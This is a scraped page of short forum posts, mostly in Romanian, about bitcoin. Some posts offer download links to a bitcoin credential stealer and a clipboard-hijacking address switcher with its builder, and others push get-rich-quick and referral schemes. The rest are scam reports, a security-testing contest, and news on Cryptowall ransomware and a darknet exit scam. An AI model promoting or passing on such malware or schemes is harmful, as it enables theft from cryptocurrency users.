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  1. Salutare baietii iar, la postu precedent am avut un mail care a ramas prin inbox ca nu prea am dat cu ochiu, nu stiu care esti da poate dau o bere, vroiai o adresa de btc so here xxx Postu Asta
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  4. Salutare tuturor! Am gasit acum 2 saptamani in urma un BitcoinStealer. De frica sa nu fiu infectat cumva l-am testat intr-un virtula machine si chiar a functionat. Imi place ca poate functiona ca un stealer clasic, furand parolele la siteuri de exchange precum Coinbase, Bittrex, HitBTC etc, dar poate fi setat ca bitcoinii sa fie trimisi la o anumita adresa. Va las linkul de download mai jos pentru cei interesati. LINK: http://bit.ly/2BsAZ82 banned: (M2G) Descarcati doar ca si sample daca vreti sa-l analizati
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  9. BTC Switcharoo is very simple, it replaces an address on the persons clipboard with your own. This does not start with Windows so you can use it with your crypters if need be. I was intending to make it in .NET, but that would be too easy, so I set myself a challenge. Its coded in C, for those wondering, and compiled with Tiny C Compiler. Tested on XP x86 and Windows 7 x64 Made a really simple builder for it in .NET, you'll find a screenshot below. FOLLOW INSTRUCTIONS IN .TXT FILE !! BTC SWITCHAROO BUILDER.7z — RGhost — file sharing Enjoy.
  10. Hello dear members! I'am sharing method, how to earn 1 bitcoin in day! It's very easy! (1 Bitcoin = 370$ ) My last payments . After email confirm, You can claim sashoti every 10 minute! This is best website, i have earn 1 bitcoin today!!!
  11. Nu am stiut unde sa incadrez thread-ul asa ca l-am pus la offtopic sa nu incurc pe nimeni. Asadar, dupa cum spune si titlul, minati vreun coin ? Detineti anumite coin-uri intr-o cantitate cat de cat semnificativa ? Ce case de schimb folositi ? Ce hardware folositi pentru minat si ce hashrate atingeti ? Care moneda vi se pare de viitor ? Aveti vreun sfat ?
  12. Salut, Hello, Content de te revoir! Sunt cunoscut ca si Pix_xiE pe web. Am fost atras de computere inca de la varsta de 7 ani insa familia mea nu si-a permis un computer pe atunci asa ca le-am acordat putina atentie. In 2006 ai mei mi-au cumparat primul computer intr-o zi de iarna (in apropiere de Craciun). Am fost atras de idee in general, ideea de a avea acces la o baza atat de mare de informatii intr-un monitor atat de mic (acum a devenit ceva mai mare si a facut 2 copilasi, dar nah; pana si monitoarele se maturizeaza ). V-ati gandit vreodata ce-ar putea face un adolescent daca si-ar sincroniza timpul petrecut la computer astfel incat sa se concentreze DOAR pe lucrurile care i-ar putea schimba/imbunatati felul in care gandeste si viata ? Presupun ca da. "knowledge is power" , asa a fost si asa va ramane. La 15 ani am auzit prima oara de conceptul de bitcoin iar la 16 ani, cand navigand la intamplare pe un forum cineva discuta despre noua moneda virtuala. Am inceput prin a ma interesa pe cat de mult despre felul in care functioneaza acest sistem lovindu-ma de notiuni ample de criptografie, matematica si informatica. Acum 2 ani, intr-o zi oarecare si avand cateva probleme personale si financiare am vazut in bitcoin o portita spre un taram al viselor. Acela a fost momentul in care m-am decis sa ma apuc serios de studiat securitatea sistemelor (cu alte cuvinte daca stii cum functioneaza securitatea unui computer/server stii si cum sa o spargi, ceea ce este adevarat.Ex: Daca stii cum sa inchizi o usa, stii si cum sa o deschizi, e logic.) Am fost atras in mare parte de metodele de criptografie folosite de moneda si de raspunsul la intrebarea: cum pot deschide portofelul x fara o parola, cum pot afla o parola de la sistemul y si cum pot transfera de la x la y fara a lasa vreun log in urma. Asa am pus bazele unui mic grup cu cativa prieteni de facultate. Am aflat mai multe despre diverse metode intr-un loc numit deep web dupa cateva zile de cautare, cei care au auzit stiu despre ce vorbesc. Informatiile pe care le poti gasi acolo sunt mind-blowing. daca stii cum si unde sa cauti. Nu am facut asta pentru bani (moneda Bitcoin este una foarte interesanta) banii sunt un bonus, o recompensa care ne aduce cu un nivel mai sus fata de restul. In primul rand majoritatea o facem pentru ca ne macina o curiozitate si suntem alergici la mistere cand vine vorba de lumea virtuala (sau de fete). Altii o fac doar pentru bani si le inteleg motivele unora, Romania este o tara saraca si ma tem ca va fi pentru mult timp. Hackingul mi-a schimbat viata din mai multe puncte de vedere si mi-a schimbato in bine. In viata de zi cu zi ma ocup de asigurarea securitatii la o firma de IT renumita, in timpul liber imi fac de cap. In rest, sunt un om simplu si obisnuit la fel ca si voi. Un singur mesaj pentru micii incepatori in lumea hackingului: Fiti curiosi, curiozitatea este una dintre cele mai frumoase trasaturi umane. Folositi-va abilitatile pentru a schimba lumea in ceva mai bun decat azi si luptati pentru a face din visele de azi realitatea de maine Daca va pot ajuta cu ceva aveti trimiteti-mi un pm, voi raspunde in timpul liber. SUCCES ! P.S. Joke time: Daca va intalniti cu vreun agent FBI trimiteti-le mesajul asta din partea mea www.youtube.com/watch?v=j5-yKhDd64s -Pix_xiE is NOT afraid-
  13. Primesc PM de la un gagiu florinandrei2000, si citez: "Salut. Vrei sa castigi 16$ in bitcoin? Daca da fa un cont pe Plat? online cu o solu?ie prepl?tit? sigur? - paysafecard.com si fa update la statutul unlimited. Dupa ce ai statutul unlimited lasa-mi user parola si raspuns la intrebarea secreta si in maxim 3 ore iti trimit banii in bitcoin." A ce va miroase?
  14. Utilizatorul @CarryOn care "cumpara" bitcoin: https://rstforums.com/forum/102725-cumpar-bitcoin-ofer-paypal.rst#post639371 este un tepar, i-am trimis 30$ bitcoin si a disparut.. ca Elodia. Nu mai raspunde la mesaje, etc.. Eventual un admin sa ii dea ban ca sa nu mai prosteasca lumea in continuare.
  15. Am 40$ in PayPal, cumpar Bitcoin de minim 10$. Rata 1:1 la pretul de pe preev.com PM.
  16. Since the Angler Exploit Kit began in late May spreading Cryptowall 3.0 ransomware, traffic containing the malware has continued to grow, putting more potential victims in harm’s way. Today, the SANS Internet Storm Center reported that Cryptowall 3.0 infections are emanating from not only the prolific exploit kit, but also from malicious spam campaigns. The two means of infections share some common characteristics, lending credence to the theory that the same group may be behind both. Version 3.0 is the latest iteration of Cryptowall, which is also known as Crowti. Like other ransomware families, Cryptowall 3.0 encrypts files stored on a compromised computer and demands a ransom, usually $500 payable in Bitcoin, in exchange for the encryption key. The malware uses numerous channels to communicate and send stolen traffic to its keepers, including I2P and Tor anonymity networks. Researchers at Cisco in February said that Cryptowall 3.0 abandoned using a dropper for propagation, opting instead to use exploit kits. As of this morning, SANS incident handler and Rackspace security researcher Brad Duncan said that the latest run of Angler Exploit Kit traffic showed that the attackers had added a different Bitcoin address than the one used previously. “At this point, I’m not 100 percent certain it’s the same actor behind all this Cryptowall 3.0 we’ve been seeing lately,” Duncan wrote on the SANS ISC website. “However, my gut feeling tells me this activity is all related to the same actor or group. The timing is too much of a coincidence.” Duncan told Threatpost that a check on blockchain.info for activity on the two Bitcoin addresses shows some transactions, indicating some victims are paying the ransom. “We’re seeing a lot more samples of CryptoWall 3.0 in the spam/EK traffic now than before, so maybe the increased exposure might help infect more computers,” Duncan said, adding that he had no data on whether any of the victims who did pay the ransom were receiving encryption keys and are able to salvage their data. Duncan said this latest spike began May 25 from both the malicious spam and Angler angles; both campaigns were still active as of early this morning. The spam campaign uses Yahoo email addresses to send Cryptowall 3.0 via attachments. The attachments are called my_resume.zip and contain an HTML file called my_resume.svg. Duncan said the attackers have begun appending numbers to the file names, such as resume4210.html or resume9647.html. “Opening the attachment and extracting the malicious file gives you an HTML document. If you open one of these HTML files, your browser will generate traffic to a compromised server,” Duncan wrote. “The return traffic is gzip compressed, so you won’t see it in the TCP stream from Wireshark. Exporting the text from Wireshark shows HTML that points to a shared document from a Google server.” Cryptowall is hosted on a number of different docs.google.com URLs, he said, a list of which is posted on the SANS website. The Bitcoin address used for payment in the spam campaign is 16REtGSobiQZoprFnXZBR2mSWvRyUSJ3ag, the same address found in other spam samples. Infections coming from Angler began May 26, and were the first Cryptowall 3.0 infections seen from Angler. The Bitcoin address used in Angler infections is 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB, SANS said. Duncan reports that a second Bitcoin address, 12LE1yNak3ZuNTLa95KYR2CQSKb6rZnELb, was used as of today. “There are any number of reasons to use more than one Bitcoin address. It could be a back-up, in case law enforcement is closing in on the other one. It could be a way to track different infections, geographically,” Duncan said. “I’m not sure on this one. It’s just my gut feeling, which could be wrong.” Duncan said that a new slate of WordPress sites were redirecting to Angler in this campaign, based on web injects observed. “The significance is that there are plenty of vulnerable websites running outdated or unpatched versions of WordPress,” Duncan said. “The actors behind this (and other) campaigns will have a continuous supply of websites that can be compromised and used for these efforts.” Source
  17. ofer metoda de a face bitcoin cu 100% reusita fara pierdere, fara depozitare, plata se face in fiecare vineri metoda o dau in privat
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  20. Salut, Daca vreti 10$ gratis in cateva minute, pe care ii puteti scoate ca si BitCoin, inregistrati-va aici: BitGold.com/r/w16Byg (da, este link de referral, insa daca va inregistrati fara nu primiti nimic). Dovada aici. O sa va ceara: Verificare e-mail Verificare telefon Verificare I.D. (puteti folosi buletin/pasaport/etc.) Mai ofer si eu cate 3$ in Bitcoin fiecarui utilizator care se inscrie folosind linkul meu. PM dupa ce ati facut toti pasii.
  21. Salut, lucrez de cateva saptamani la un marketplace, in care oricine se poate inregistra si vinde produse digitale prin bitcoin. mai am cateva saptamani de lucru, la seo, si alte functii. totusi intre timp as fi curios daca am facut greseli mari la securitate, sunt un programator de nivel mediu 2,3 anni experienta, pentru asta apelez la voi, nu am foarte multi bani la dispozitie, totusi pun la bataie 100 usd bitcoin pentru acest concurs. site : Simple Flask app with local Captcha user : admin pass : admin Siteul foloseste database remote, uneori o sa va dea erroare, rezolvarea e sa dati un refresh. Nu luati in considerare designul siteului o sa fie facut la sfarsit. Orice sfat sau ideee este bine venit. Va multumesc, Cu respect Ionut edit : As fi recunoscator daca imi ziceti, am incercat aia si aia dar fara success siteul e ok. Maresc miza la 500 usd ..
  22. salut, imi recomandati va rog un portofel bitcoin care sa fie safe din toate puncetele de vedere am vazut cateva pe google dar fiecare are cate un minus.. multumesc!
  23. .......
  24. Thomas Ji?ikovský, an alleged Owner of one of the most popular Darknet website ‘Sheep Marketplace,’ has been arrested after laundering around $40 Million, making it one of the biggest exit scams in Darknet history. After the arrest of Silk Road owner 'Ross Ulbricht' in 2013 -- Sheep Marketplace became the next famous anonymous underground marketplace among Black Market customers for selling illicit products, especially drugs. But only after few weeks, Sheep Marketplace was suddenly disappeared and was taken offline by its owner, who had been suspected of stealing $40 million worth of Bitcoins at the time when Bitcoin market value was at the peak. Shortly after this Bitcoin Scam, a Darknet commentator ‘Gwern Branwen’ doxed the owner, and the suspect was identified -- Thomas Ji?ikovský as the owner of the black market website. Unfortunately, Ji?ikovský forgot to hide his identity and residential address from the Internet, which was exposed by his Facebook page. However, immediately after his identity exposure, Ji?ikovský denied his involvement in the Darknet Sheep Marketplace. While Investigating for stolen money from online market, Czech police noticed a suspicious young programmer who attempted to buy a luxury home worth 8.7 Million Czech Koruna ($345,000 USD) in Lusatia, a region in the Czech Republic, under his grandfather’s name. Additional investigation revealed that in January last year, a new bank account of 26-years old Eva Bartošová received a huge payment of almost 900,000 Crowns from a foreign Bitcoin Money Exchange company. However, the young woman was unable to justify the source of the money. According to Czech media, ‘Eva Bartošová’ is ‘Thomas Ji?ikovský’ wife, who helped him to transfer the stolen money to her freshly created bank account. Czech’s Economic Police wing investigated into Ji?ikovský's money and found that the house had been purchased entirely using Bitcoin. Two weeks back, another largest Deep Web drugs marketplace ‘Evolution’ disappeared suddenly with rumors circulating that its owners may have scammed its massive user base and stole $12 Million in Bitcoin Source
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